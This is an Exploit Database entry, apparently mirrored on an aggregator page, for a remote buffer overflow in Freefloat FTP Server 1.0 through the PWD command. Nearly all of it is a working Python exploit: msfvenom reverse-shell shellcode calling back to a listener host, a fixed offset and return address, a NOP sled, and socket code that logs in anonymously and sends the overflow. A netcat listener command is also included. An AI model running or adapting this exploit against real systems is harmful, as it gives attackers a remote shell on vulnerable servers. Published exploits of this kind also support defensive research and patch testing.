Freefloat FTP Server 1.0 – ‘PWD’ Remote Buffer Overflow

• Exploit Database
• 13 阅读

• 作者： Waqas Ahmed Faroouqi
  日期： 2023-09-04
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51706/

• #Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
  #Date: 08/22/2023
  #Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
  #Vendor Homepage: http://www.freefoat.com
  #Version: 1.0
  #Tested on Windows XP SP3 
  
  
  #!/usr/bin/python
  
  import socket
  
  #Metasploit Shellcode
  #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d' 
  
  #nc -lvp 4444
  #Send exploit
  
  
  #offset = 247 
  #badchars=\x00\x0d\
  #return_address=\x3b\x69\x5a\x77 (ole32.dll)
  
  payload = (
  "\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9"
  "\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca"
  "\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83"
  "\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26"
  "\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49"
  "\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54"
  "\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66"
  "\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1"
  "\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a"
  "\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82"
  "\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7"
  "\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9"
  "\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41"
  "\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac"
  "\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a"
  "\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc"
  "\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4"
  "\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f"
  "\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29"
  "\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf"
  "\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7"
  "\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d"
  "\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac"
  "\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6"
  "\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0"
  "\x19")
  
  shellcode = 'A' * 247 + "\x3b\x69\x5a\x77" + '\x90' * 10 + payload
  
  def main():
  ip = '192.168.146.135'
  port = 21
  
  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.connect((ip, port))
  
  sock.recv(1024)
  sock.send('USER anonymous\r\n')
  sock.recv(1024)
  sock.send('PASS anonymous\r\n')
  sock.recv(1024)
  sock.send('pwd ' + shellcode + '\r\n')
  sock.close()
  
  if __name__ == '__main__':
  main()